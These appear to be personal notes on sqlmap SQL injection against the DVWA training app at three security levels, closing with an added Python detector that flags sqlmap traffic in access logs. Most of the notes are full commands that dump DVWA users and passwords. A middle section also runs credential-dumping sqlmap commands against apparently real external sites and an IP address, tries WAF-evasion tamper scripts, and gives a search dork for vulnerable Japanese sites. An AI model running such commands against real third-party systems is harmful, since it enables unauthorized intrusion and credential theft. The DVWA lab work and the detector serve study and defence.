0x01
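Burp Suite (bp) capture setup for the target machine: to capture DVWA traffic in Firefox,
enter in the URL bar: about:config
network.proxy.allow_hijacking_localhost
and change the value to true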
0x02
sqlmap against DVWA at the three security levels
Low level: it needs cookies; just set them.
sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch
--forms
sqlmap -u "http://117.41.229.122:8003/?id=1" --columns -T admin
http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
cookies:PHPSESSID:"d4bqtmj0c1sa2ploo0dqupke2c"
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --dbs
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --current-db
python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --users --passwords
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa --tables
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa -T users --columns
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa -T users -C "user,password" --dump
External sites didn't really work; combining with a tamper script didn't work either.
sqlmap.py -u "http://www. .net/productInfo.asp?ID=565" --batch -risk 3 level 5 --identify-waf --tamper "space2morehash.py"
sqlmap.py -u "http://www.idcsol.com/solution.asp?ID=1" --batch --dbs
sqlmap.py -u "http://www.idcsol.com/solution.asp?ID=15" --batch --users --passwords
sqlmap.py -u "http://www.idcsol.com/showSuccess.asp?ID=15" --batch --users --passwords
http://www.idcsol.com/solution.asp?ID=3
Searched for Japanese ones: inurl:conpany.asp?id= site:jp
Medium level (mid)
There is a drop-down box, so separate the address and the cookie.
PHPSESSID:"d4bqtmj0c1sa2ploo0dqupke2c"
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --dbs
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --current-db
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --users
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --current-user
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --passwords
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa --tables
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa -T users --columns
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa -T users -C "user,password" --dump
high
A pop-up page URL is added.
PHPSESSID:"d4bqtmj0c1sa2ploo0dqupke2c"
sqlmap.py --url="http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=1&Submit=Submit" --second-url="http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1; security=high; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch
sqlmap.py --url="http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=1&Submit=Submit" --second-url="http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1; security=high; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --dbs
sqlmap.py --url="http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=1&Submit=Submit" --second-url="http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1; security=high; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch --users --passwords
sqlmap.py --url="http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=1&Submit=Submit" --second-url="http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie="id=1; security=high; PHPSESSID=d4bqtmj0c1sa2ploo0dqupke2c" --batch -D dvwa --tables
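What the runs above look like from the server side, as an added example (not part of the original notes): a small detector that scans web access-log lines for the DVWA sqli endpoints and flags sqlmap's default User-Agent and SQL tokens in the id parameter. It assumes the Apache combined log format and that sqlmap is run without --random-agent or --user-agent, as in the commands on this page; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined log format), not from a real server.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=1&Submit=Submit HTTP/1.1" 200 4500 "-" "Mozilla/5.0 Firefox/115.0"',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20-&Submit=Submit HTTP/1.1"'
    ' 200 4700 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "POST /dvwa/vulnerabilities/'
    'sqli_blind/ HTTP/1.1" 200 4400 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=2%20AND%20SLEEP(5)&Submit=Submit HTTP/1.1" 200 4400 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Tokens that have no place in a numeric id parameter.
SQLI_RE = re.compile(r"(?i)'|--\s|\bunion\b.+\bselect\b|\b(sleep|benchmark)\s*\(")
WATCHED_PREFIX = "/dvwa/vulnerabilities/sqli"  # covers sqli/ and sqli_blind/

def classify(line):
    """Return the reasons a log line is suspicious, or None if it is not watched."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.startswith(WATCHED_PREFIX):
        return None
    reasons = []
    if "sqlmap/" in m["ua"].lower():
        reasons.append("sqlmap-user-agent")
    # parse_qs percent-decodes, so encoded payloads are matched in clear text.
    if any(SQLI_RE.search(v) for v in parse_qs(parts.query).get("id", [])):
        reasons.append("sqli-token-in-id")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for every flagged line."""
    findings = []
    for n, line in enumerate(lines, 1):
        reasons = classify(line)
        if reasons:
            findings.append((n, reasons))
    return findings

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(n, ", ".join(reasons))
```

For the medium and high runs the payload travels in the POST body or the cookie, which an access log in this format does not record, so only the User-Agent signal fires there; seeing those payloads needs request-body or cookie logging.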